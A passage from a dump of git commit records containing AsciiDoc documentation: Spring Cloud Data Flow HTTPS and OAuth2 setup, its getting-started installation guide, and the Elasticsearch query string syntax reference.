`9393`, you may choose to change the port to a more common HTTPs-typical port.\n<2> The alias (or name) under which the key is stored in the keystore.\n<3> The path to the keystore file. Classpath resources may also be specified, by using the classpath prefix: `classpath:path\/to\/keystore`\n<4> The password of the keystore.\n<5> The password of the key.\n<6> The path to the truststore file. Classpath resources may also be specified, by using the classpath prefix: `classpath:path\/to\/trust-store`\n<7> The password of the trust store.\n\nNOTE: If HTTPS is enabled, it will completely replace HTTP as the protocol over\nwhich the REST endpoints and the Data Flow Dashboard interact. Plain HTTP requests\nwill fail - therefore, make sure that you configure your Shell accordingly.\n\n==== Using Self-Signed Certificates\n\nFor testing purposes or during development it might be convenient to create self-signed certificates.\nTo get started, execute the following command to create a certificate:\n\n[source,bash]\n----\n$ keytool -genkey -alias dataflow -keyalg RSA -keystore dataflow.keystore \\\n -validity 3650 -storetype JKS \\\n -dname \"CN=localhost, OU=Spring, O=Pivotal, L=Kailua-Kona, ST=HI, C=US\" # <1>\n -keypass dataflow -storepass dataflow\n----\n\n<1> _CN_ is the only important parameter here. It should match the domain you are trying to access, e.g. `localhost`.\n\nThen add the following to your `application.yml` file:\n\n[source,yaml]\n----\nserver:\n port: 8443\n ssl:\n enabled: true\n key-alias: dataflow\n key-store: \"\/your\/path\/to\/dataflow.keystore\"\n key-store-type: jks\n key-store-password: dataflow\n key-password: dataflow\n----\n\nThis is all that's needed for the Data Flow Server. Once you start the server,\nyou should be able to access it via https:\/\/localhost:8443\/[https:\/\/localhost:8443\/]. As this is a self-signed\ncertificate, you will hit a warning in your browser, that you need to ignore.\n\nThis issue also is relevant for the Data Flow Shell. 
Therefore additional steps are\nnecessary to make the Shell work with self-signed certificates. First, we need to\nexport the previously created certificate from the keystore:\n\n[source,bash]\n----\n$ keytool -export -alias dataflow -keystore dataflow.keystore -file dataflow_cert -storepass dataflow\n----\n\nNext, we need to create a truststore which the Shell will use:\n\n[source,bash]\n----\n$ keytool -importcert -keystore dataflow.truststore -alias dataflow -storepass dataflow -file dataflow_cert -noprompt\n----\n\nNow, you are ready to launch the Data Flow Shell using the following JVM arguments:\n\n[source,bash,subs=attributes]\n----\n$ java -Djavax.net.ssl.trustStorePassword=dataflow \\\n -Djavax.net.ssl.trustStore=\/path\/to\/dataflow.truststore \\\n -Djavax.net.ssl.trustStoreType=jks \\\n -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n\n[TIP]\n====\nIn case you run into trouble establishing a connection via SSL, you can enable additional\nlogging by using and setting the `javax.net.debug` JVM argument to `ssl`.\n====\n\nDon't forget to target the Data Flow Server with:\n\n[source,bash]\n----\ndataflow:> dataflow config server https:\/\/localhost:8443\/\n----\n\n[[getting-started-security-enabling-authentication]]\n=== Enabling Authentication\n\nBy default, the REST endpoints (administration, management and health), as well\nas the Dashboard UI do not require authenticated access. However, authentication can\nbe provided via http:\/\/oauth.net\/2\/[OAuth 2.0], thus allowing you to also integrate Spring Cloud\nData Flow into Single Sign On (SSO) environments. The following 2 OAuth2 Grant Types will be used:\n\n* _Authorization Code_ - Used for the GUI (Browser) integration. You will be redirected to your OAuth Service for authentication\n* _Password_ - Used by the shell (And the REST integration), so you can login using username and password\n\nThe REST endpoints are secured via Basic Authentication but will use the Password\nGrand Type under the covers to authenticate with your OAuth2 service.\n\nNOTE: When authentication is set up, it is strongly recommended to enable HTTPS\nas well, especially in production environments.\n\nYou can turn on authentication by adding the following to `application.yml` or via\nenvironment variables:\n\n[source,yaml]\n----\nsecurity:\n basic:\n enabled: true # <1>\n realm: Spring Cloud Data Flow # <2>\n oauth2: # <3>\n client:\n client-id: myclient\n client-secret: mysecret\n access-token-uri: http:\/\/127.0.0.1:9999\/oauth\/token\n user-authorization-uri: http:\/\/127.0.0.1:9999\/oauth\/authorize\n resource:\n user-info-uri: http:\/\/127.0.0.1:9999\/me\n----\n\n<1> Must be set to `true` for security to be enabled.\n<2> The realm for Basic authentication\n<3> OAuth Configuration Section\n\nNOTE: As of version 1.0 Spring Cloud Data Flow does not provide finer-grained authorization. 
Thus, once you are logged in, you have full access to all functionality.\n\nYou can verify that basic authentication is working properly using _curl_:\n\n[source,bash]\n----\n$ curl -u myusername:mypassword http:\/\/localhost:9393\/\n----\n\nAs a result you should see a list of available REST endpoints.\n\n[[getting-started-security-enabling-authentication-cloud-foundry]]\n==== Authentication and Cloud Foundry\n\nWhen deploying Spring Cloud Data Flow to Cloud Foundry, we take advantage of the\nhttps:\/\/github.com\/pivotal-cf\/spring-cloud-sso-connector[_Spring Cloud Single Sign-On Connector_],\nwhich provides Cloud Foundry specific auto-configuration support for OAuth 2.0\nwhen used in conjunction with the _Pivotal Single Sign-On Service_.\n\nSimply set `security.basic.enabled` to `true` and in Cloud Foundry bind the SSO\nservice to your Data Flow Server app and SSO will be enabled.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4690799f9fa2df0a10f599d5eeef321395b2ca69","subject":"small doc fix with --dataflow.uri option","message":"small doc fix with --dataflow.uri option\n","repos":"markpollack\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,mminella\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,trisberg\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,markfisher\/spring-cloud-data,mminella\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,markfisher\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,markfisher\/spring-cloud-data,cppwfs\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data","old_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started.adoc","new_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started.adoc","new_contents":"[[getting-started]]\n= Getting started\n\n[partintro]\n--\nIf you're just getting started with Spring Cloud Data Flow, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe'll then build our first Spring Cloud Data Flow application, discussing some core principles as\nwe go.\n--\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 8 or later), and to build, you need to have Maven installed as well.\n\nYou need to have an RDBMS for storing stream, task and app states in the database. The `local` Data Flow server by default uses embedded H2 database for this.\n\nYou also need to have link:https:\/\/redis.io[Redis] running if you are running any streams that involve analytics applications. 
Redis may also be required to run the unit\/integration tests.\n\nFor the deployed streams and tasks to communicate, either link:http:\/\/www.rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka] needs to be installed.\n\n[[getting-started-deploying-spring-cloud-dataflow]]\n== Installation\n\nStarting with 1.3.x, the Data Flow Server can run in either `skipper` or `classic` (non-skipper) mode.\nThe mode can be specified when starting the Data Flow server using the property `spring.cloud.dataflow.features.skipper-enabled`.\nBy default, the `classic` mode is enabled.\n\n. Download the Spring Cloud Data Flow Server and Shell apps:\n+\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-server-local\/{project-version}\/spring-cloud-dataflow-server-local-{project-version}.jar\n\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\n. Download http:\/\/cloud.spring.io\/spring-cloud-skipper\/[Skipper] if you would like the added features of upgrading and rolling back Streams, since Data Flow delegates to Skipper for those features.\n+\n[source,yaml,options=nowrap,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-server\/{skipper-version}\/spring-cloud-skipper-server-{skipper-version}.jar\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-shell\/{skipper-version}\/spring-cloud-skipper-shell-{skipper-version}.jar\n----\n+\n. Launch Skipper (required only if you want to run Spring Cloud Data Flow server in `skipper` mode)\n+\nIn the directory where you downloaded Skipper, run the server using `java -jar`:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-skipper-server-{skipper-version}.jar\n----\n+\n. Launch the Data Flow Server\n+\nIn the directory where you downloaded Data Flow, run the server using `java -jar`.\n+\nTo run the Data Flow server in `classic` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----\n+\nTo run the Data Flow server in `skipper` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --spring.cloud.dataflow.features.skipper-enabled=true\n----\n+\nIf Skipper and the Data Flow server are not running on the same host, set the configuration property `spring.cloud.skipper.client.serverUri` to the location of Skipper, e.g.\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --spring.cloud.skipper.client.serverUri=http:\/\/198.51.100.1:7577\/api\n----
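+\nThis property, like any other Spring Boot configuration property, can also be supplied through the environment via `SPRING_APPLICATION_JSON` instead of on the command line. A minimal sketch (the address is the same placeholder as above):\n+\n[source,bash,subs=attributes]\n----\n$ SPRING_APPLICATION_JSON='{\"spring.cloud.skipper.client.serverUri\":\"http:\/\/198.51.100.1:7577\/api\"}' java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----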
+\n. Launch the Data Flow Shell:\n+\nLaunching the Data Flow shell requires the appropriate Data Flow Server mode to be specified.\nTo start the Data Flow Shell for the Data Flow server running in `classic` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\nTo start the Data Flow Shell for the Data Flow server running in `skipper` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar --dataflow.mode=skipper\n----\n\nNOTE: Both the Data Flow Server and the Shell must be in the same mode.\n\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server URL using the `dataflow config server` command when in the shell's interactive mode:\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/198.51.100.0\nSuccessfully targeted http:\/\/198.51.100.0\ndataflow:>\n----\n\nAlternatively, pass in the command line option `--dataflow.uri`. The shell's command line option `--help` shows what is available.\n\n[[getting-started-deploying-streams-spring-cloud-dataflow]]\n== Deploying Streams\n. Import Apps\n+\nBy default, the application registry will be empty.\nLet's register two applications, `http` and `log`, that communicate using RabbitMQ.\n+\n```\ndataflow:>app register --name http --type source --uri maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'source:http'\n\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.1.0.RELEASE\nSuccessfully registered application 'sink:log'\n```\n+\nFor more details, such as how to register applications that are based on docker containers or use Kafka as the messaging middleware, review the section on how to <<streams.adoc#spring-cloud-dataflow-register-stream-apps, register applications>>.\n+\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n+\nThere are two options for deploying Streams: the \"traditional\" way that Data Flow has always used, and a new way that delegates to the Skipper server. Deploying using Skipper will enable you to update and roll back the streams, while the traditional way will not.\n+\n. Create Streams without Skipper\n+\nYou can now use the shell commands to list available applications (source\/processors\/sink) and create streams.
For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\"\ndataflow:> stream deploy --name httptest\n----\n+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Skipper server for the location of the log\nfiles for the `http` and `log` applications. Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n\nYou can read more about the general features of using Skipper to deploy streams in the section <<spring-cloud-dataflow-stream-lifecycle-skipper>> and how to upgrade and rollback streams in the section <<spring-cloud-dataflow-streams-skipper>>.\n\n[NOTE]\n====\nWhen deploying locally, each app (and each app instance, in case of `count>1`) gets a dynamically assigned `server.port`\nunless you explicitly assign one with `--server.port=x`. In both cases, this setting is propagated as a configuration\nproperty that will override any lower-level setting that you may have used (_e.g._ in `application.yml` files).\n====\n\n== Deploying Tasks\nRefer to the section, <<spring-cloud-dataflow-register-task-apps>>, for an example on how to get started using Tasks in Spring Cloud Data Flow.\n","old_contents":"[[getting-started]]\n= Getting started\n\n[partintro]\n--\nIf you're just getting started with Spring Cloud Data Flow, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe'll then build our first Spring Cloud Data Flow application, discussing some core principles as\nwe go.\n--\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 8 or later), and to build, you need to have Maven installed as well.\n\nYou need to have an RDBMS for storing stream, task and app states in the database. The `local` Data Flow server by default uses embedded H2 database for this.\n\nYou also need to have link:https:\/\/redis.io[Redis] running if you are running any streams that involve analytics applications. Redis may also be required run the unit\/integration tests.\n\nFor the deployed streams and tasks to communicate, either link:http:\/\/www.rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka] needs to be installed.\n\n[[getting-started-deploying-spring-cloud-dataflow]]\n== Installation\n\nStarting 1.3.x, the Data Flow Server can run in either `skipper` or `classic` (non-skipper) modes.\nThe modes can be specified when starting the Data Flow server using the property `spring.cloud.dataflow.features.skipper-enabled`.\nBy default, the `classic` mode is enabled.\n\n. Download the Spring Cloud Data Flow Server and Shell apps:\n+\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-server-local\/{project-version}\/spring-cloud-dataflow-server-local-{project-version}.jar\n\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\n. 
Download http:\/\/cloud.spring.io\/spring-cloud-skipper\/[Skipper] if you would like the added features of upgrading and rolling back Streams since Data Flow delegates to Skipper for those features.\n+\n[source,yaml,options=nowrap,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-server\/{skipper-version}\/spring-cloud-skipper-server-{skipper-version}.jar\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-shell\/{skipper-version}\/spring-cloud-skipper-shell-{skipper-version}.jar\n----\n+\n. Launch Skipper (Required only if you want to run Spring Cloud Data Flow server in `skipper` mode)\n+\nIn the directory where you downloaded skipper, run the server using `java -jar`\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-skipper-server-{skipper-version}.jar\n----\n+\n. Launch the Data Flow Server\n+\nIn the directory where you downloaded Data Flow, run the server using `java -jar`\n+\nTo run the Data Flow server in `classic` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----\n+\nTo run the Data Flow server in `skipper` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --spring.cloud.dataflow.features.skipper-enabled=true\n----\n+\nIf Skipper and the Data Flow server are not running on the same host, set the configuration property `spring.cloud.skipper.client.serverUri` to the location of Skipper, e.g.\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --spring.cloud.skipper.client.serverUri=http:\/\/192.51.100.1:7577\/api\n----\n+\n. Launch the Data Flow Shell:\n+\nLaunching the Data Flow shell requires the appropriate data flow server mode to be specified.\nTo start the Data Flow Shell for the Data Flow server running in `classic` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\nTo start the Data Flow Shell for the Data Flow server running in `skipper` mode:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar --dataflow.mode=skipper\n----\n\nNOTE: Both the Data Flow Server and the Shell must be on the same mode.\n\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server URL:\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/198.51.100.0\nSuccessfully targeted http:\/\/198.51.100.0\ndataflow:>\n----\n\n[[getting-started-deploying-streams-spring-cloud-dataflow]]\n== Deploying Streams\n. 
Import Apps\n+\nBy default, the application registry will be empty.\nLet's register two applications, `http` and `log` that communicate using RabbitMQ.\n+\n```\ndataflow:>app register --name http --type source --uri maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'source:http'\n\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.1.0.RELEASE\nSuccessfully registered application 'sink:log'\n```\n+\nFor more details, such as how to register applications that are based on docker containers or use Kafka as the messaging middleware, review the section on how to <<streams.adoc#spring-cloud-dataflow-register-stream-apps, register applications>>.\n+\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n+\nThere are two options for deploying Streams. The \"traditional\" way that Data Flow has always used and a new way that delegates to the Skipper server. Deploying using Skipper will enable you to update and rollback the streams while the traditional way will not.\n+\n. Create Streams without Skipper\n+\nYou can now use the shell commands to list available applications (source\/processors\/sink) and create streams. For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\" --deploy\n----\n+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Data Flow server for the location of the log\nfiles for the `http` and `log` applications. Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n+\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n+\n. Create Streams with Skipper\n+\nYou can now use the shell commands to list available applications (source\/processors\/sink) and create streams. For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\"\ndataflow:> stream deploy --name httptest\n----\n+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Skipper server for the location of the log\nfiles for the `http` and `log` applications. Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n\nYou can read more about the general features of using Skipper to deploy streams in the section <<spring-cloud-dataflow-stream-lifecycle-skipper>> and how to upgrade and rollback streams in the section <<spring-cloud-dataflow-streams-skipper>>.\n\n[NOTE]\n====\nWhen deploying locally, each app (and each app instance, in case of `count>1`) gets a dynamically assigned `server.port`\nunless you explicitly assign one with `--server.port=x`. 
In both cases, this setting is propagated as a configuration\nproperty that will override any lower-level setting that you may have used (_e.g._ in `application.yml` files).\n====\n\n== Deploying Tasks\nRefer to the section, <<spring-cloud-dataflow-register-task-apps>>, for an example on how to get started using Tasks in Spring Cloud Data Flow.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81f0a4abe4503bb88b90cf214d21158174ad4a73","subject":"Docs: Update query-string-syntax.asciidoc","message":"Docs: Update query-string-syntax.asciidoc\n\nCloses #6853\n","repos":"fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch","old_file":"docs\/reference\/query-dsl\/queries\/query-string-syntax.asciidoc","new_file":"docs\/reference\/query-dsl\/queries\/query-string-syntax.asciidoc","new_contents":"[[query-string-syntax]]\n\n==== Query string syntax\n\nThe query string ``mini-language'' is used by the\n<<query-dsl-query-string-query>> and by the\n`q` query string parameter in the <<search-search,`search` API>>.\n\nThe query string is parsed into a series of _terms_ and _operators_. A\nterm can be a single word -- `quick` or `brown` -- or a phrase, surrounded by\ndouble quotes -- `\"quick brown\"` -- which searches for all the words in the\nphrase, in the same order.\n\nOperators allow you to customize the search -- the available options are\nexplained below.\n\n===== Field names\n\nAs mentioned in <<query-dsl-query-string-query>>, the `default_field` is searched for the\nsearch terms, but it is possible to specify other fields in the query syntax:\n\n* where the `status` field contains `active`\n\n status:active\n\n* where the `title` field contains `quick` or `brown`.\n If you omit the OR operator the default operator will be used\n\n title:(quick OR brown)\n title:(quick brown)\n\n* where the `author` field contains the exact phrase `\"john smith\"`\n\n author:\"John Smith\"\n\n* where any of the fields `book.title`, `book.content` or `book.date` contains\n `quick` or `brown` (note how we need to escape the `*` with a backslash):\n\n book.\\*:(quick brown)\n\n* where the field `title` has no value (or is missing):\n\n _missing_:title\n\n* where the field `title` has any non-null value:\n\n _exists_:title\n\n===== Wildcards\n\nWildcard searches can be run on individual terms, using `?` to replace\na single character, and `*` to replace zero or more characters:\n\n qu?ck bro*\n\nBe aware that wildcard queries can use an enormous amount of memory and\nperform very badly -- just think how many terms need to be queried to\nmatch the query string `\"a* b* c*\"`.\n\n[WARNING]\n======\nAllowing a wildcard at the beginning of a word (eg `\"*ing\"`) is particularly\nheavy, because all terms in the index need to be examined, just in case\nthey match. Leading wildcards can be disabled by setting\n`allow_leading_wildcard` to `false`.\n======\n\nWildcarded terms are not analyzed by default -- they are lowercased\n(`lowercase_expanded_terms` defaults to `true`) but no further analysis\nis done, mainly because it is impossible to accurately analyze a word that\nis missing some of its letters. 
However, by setting `analyze_wildcard` to\n`true`, an attempt will be made to analyze wildcarded words before searching\nthe term list for matching terms.\n\n===== Regular expressions\n\nRegular expression patterns can be embedded in the query string by\nwrapping them in forward-slashes (`\"\/\"`):\n\n    name:\/joh?n(ath[oa]n)\/\n\nThe supported regular expression syntax is explained in <<regexp-syntax>>.\n\n[WARNING]\n======\nThe `allow_leading_wildcard` parameter does not have any control over\nregular expressions. A query string such as the following would force\nElasticsearch to visit every term in the index:\n\n    \/.*n\/\n\nUse with caution!\n======\n\n===== Fuzziness\n\nWe can search for terms that are\nsimilar to, but not exactly like our search terms, using the ``fuzzy''\noperator:\n\n    quikc~ brwn~ foks~\n\nThis uses the\nhttp:\/\/en.wikipedia.org\/wiki\/Damerau-Levenshtein_distance[Damerau-Levenshtein distance]\nto find all terms with a maximum of\ntwo changes, where a change is the insertion, deletion\nor substitution of a single character, or transposition of two adjacent\ncharacters.\n\nThe default _edit distance_ is `2`, but an edit distance of `1` should be\nsufficient to catch 80% of all human misspellings. It can be specified as:\n\n    quikc~1\n\n===== Proximity searches\n\nWhile a phrase query (eg `\"john smith\"`) expects all of the terms in exactly\nthe same order, a proximity query allows the specified words to be further\napart or in a different order. In the same way that fuzzy queries can\nspecify a maximum edit distance for characters in a word, a proximity search\nallows us to specify a maximum edit distance of words in a phrase:\n\n    \"fox quick\"~5\n\nThe closer the text in a field is to the original order specified in the\nquery string, the more relevant that document is considered to be. When\ncompared to the above example query, the phrase `\"quick fox\"` would be\nconsidered more relevant than `\"quick brown fox\"`.\n\n===== Ranges\n\nRanges can be specified for date, numeric or string fields. Inclusive ranges\nare specified with square brackets `[min TO max]` and exclusive ranges with\ncurly brackets `{min TO max}`.\n\n* All days in 2012:\n\n    date:[2012\/01\/01 TO 2012\/12\/31]\n\n* Numbers 1..5\n\n    count:[1 TO 5]\n\n* Tags between `alpha` and `omega`, excluding `alpha` and `omega`:\n\n    tag:{alpha TO omega}\n\n* Numbers from 10 upwards\n\n    count:[10 TO *]\n\n* Dates before 2012\n\n    date:{* TO 2012\/01\/01}\n\nCurly and square brackets can be combined:\n\n* Numbers from 1 up to but not including 5\n\n    count:[1 TO 5}\n\n\nRanges with one side unbounded can use the following syntax:\n\n    age:>10\n    age:>=10\n    age:<10\n    age:<=10\n\n[NOTE]\n===================================================================\nTo combine an upper and lower bound with the simplified syntax, you\nwould need to join two clauses with an `AND` operator:\n\n    age:(>=10 AND <20)\n    age:(+>=10 +<20)\n\n===================================================================\n\nThe parsing of ranges in query strings can be complex and error prone. 
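\n\nFor instance, the simplified bounds `age:(>=10 AND <20)` above could also be written as an explicit filter in the request body -- a sketch, where `age` is an illustrative field name:\n\n    {\n        \"range\": {\n            \"age\": { \"gte\": 10, \"lt\": 20 }\n        }\n    }\n\n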
It is\nmuch more reliable to use an explicit <<query-dsl-range-filter,`range` filter>>.\n\n\n===== Boosting\n\nUse the _boost_ operator `^` to make one term more relevant than another.\nFor instance, if we want to find all documents about foxes, but we are\nespecially interested in quick foxes:\n\n    quick^2 fox\n\nThe default `boost` value is 1, but can be any positive floating point number.\nBoosts between 0 and 1 reduce relevance.\n\nBoosts can also be applied to phrases or to groups:\n\n    \"john smith\"^2 (foo bar)^4\n\n===== Boolean operators\n\nBy default, all terms are optional, as long as one term matches. A search\nfor `foo bar baz` will find any document that contains one or more of\n`foo` or `bar` or `baz`. We have already discussed the `default_operator`\nabove, which allows you to force all terms to be required, but there are\nalso _boolean operators_ which can be used in the query string itself\nto provide more control.\n\nThe preferred operators are `+` (this term *must* be present) and `-`\n(this term *must not* be present). All other terms are optional.\nFor example, this query:\n\n    quick brown +fox -news\n\nstates that:\n\n* `fox` must be present\n* `news` must not be present\n* `quick` and `brown` are optional -- their presence increases the relevance\n\nThe familiar operators `AND`, `OR` and `NOT` (also written `&&`, `||` and `!`)\nare also supported. However, the effects of these operators can be more\ncomplicated than is obvious at first glance. `NOT` takes precedence over\n`AND`, which takes precedence over `OR`. While the `+` and `-` only affect\nthe term to the right of the operator, `AND` and `OR` can affect the terms to\nthe left and right.\n\n****\nRewriting the above query using `AND`, `OR` and `NOT` demonstrates the\ncomplexity:\n\n`quick OR brown AND fox AND NOT news`::\n\nThis is incorrect, because `brown` is now a required term.\n\n`(quick OR brown) AND fox AND NOT news`::\n\nThis is incorrect because at least one of `quick` or `brown` is now required\nand the search for those terms would be scored differently from the original\nquery.\n\n`((quick AND fox) OR (brown AND fox) OR fox) AND NOT news`::\n\nThis form now replicates the logic from the original query correctly, but\nthe relevance scoring bears little resemblance to the original.\n\nIn contrast, the same query rewritten using the <<query-dsl-match-query,`match` query>>\nwould look like this:\n\n    {\n        \"bool\": {\n            \"must\":     { \"match\": \"fox\"         },\n            \"should\":   { \"match\": \"quick brown\" },\n            \"must_not\": { \"match\": \"news\"        }\n        }\n    }\n\n****\n\n===== Grouping\n\nMultiple terms or clauses can be grouped together with parentheses, to form\nsub-queries:\n\n    (quick OR brown) AND fox\n\nGroups can be used to target a particular field, or to boost the result\nof a sub-query:\n\n    status:(active OR pending) title:(full text search)^2\n\n===== Reserved characters\n\nIf you need to use any of the characters which function as operators in your\nquery itself (and not as operators), then you should escape them with\na leading backslash. For instance, to search for `(1+1)=2`, you would\nneed to write your query as `\\(1\\+1\\)=2`.\n\nThe reserved characters are: `+ - && || ! ( ) { } [ ] ^ \" ~ * ? : \\ \/`\n\nFailing to escape these special characters correctly could lead to a syntax\nerror which prevents your query from running.\n\n.Watch this space\n****\nA space may also be a reserved character. 
For instance, if you have a\nsynonym list which converts `\"wi fi\"` to `\"wifi\"`, a `query_string` search\nfor `\"wi fi\"` would fail. The query string parser would interpret your\nquery as a search for `\"wi OR fi\"`, while the token stored in your\nindex is actually `\"wifi\"`. Escaping the space will protect it from\nbeing touched by the query string parser: `\"wi\\ fi\"`.\n****\n\n===== Empty Query\n\nIf the query string is empty or only contains whitespaces the\nquery string is interpreted as a `no_docs_query` and will yield\nan empty result set. \n","old_contents":"[[query-string-syntax]]\n\n==== Query string syntax\n\nThe query string ``mini-language'' is used by the\n<<query-dsl-query-string-query>> and by the\n`q` query string parameter in the <<search-search,`search` API>>.\n\nThe query string is parsed into a series of _terms_ and _operators_. A\nterm can be a single word -- `quick` or `brown` -- or a phrase, surrounded by\ndouble quotes -- `\"quick brown\"` -- which searches for all the words in the\nphrase, in the same order.\n\nOperators allow you to customize the search -- the available options are\nexplained below.\n\n===== Field names\n\nAs mentioned in <<query-dsl-query-string-query>>, the `default_field` is searched for the\nsearch terms, but it is possible to specify other fields in the query syntax:\n\n* where the `status` field contains `active`\n\n status:active\n\n* where the `title` field contains `quick` or `brown`\n\n title:(quick brown)\n\n* where the `author` field contains the exact phrase `\"john smith\"`\n\n author:\"John Smith\"\n\n* where any of the fields `book.title`, `book.content` or `book.date` contains\n `quick` or `brown` (note how we need to escape the `*` with a backslash):\n\n book.\\*:(quick brown)\n\n* where the field `title` has no value (or is missing):\n\n _missing_:title\n\n* where the field `title` has any non-null value:\n\n 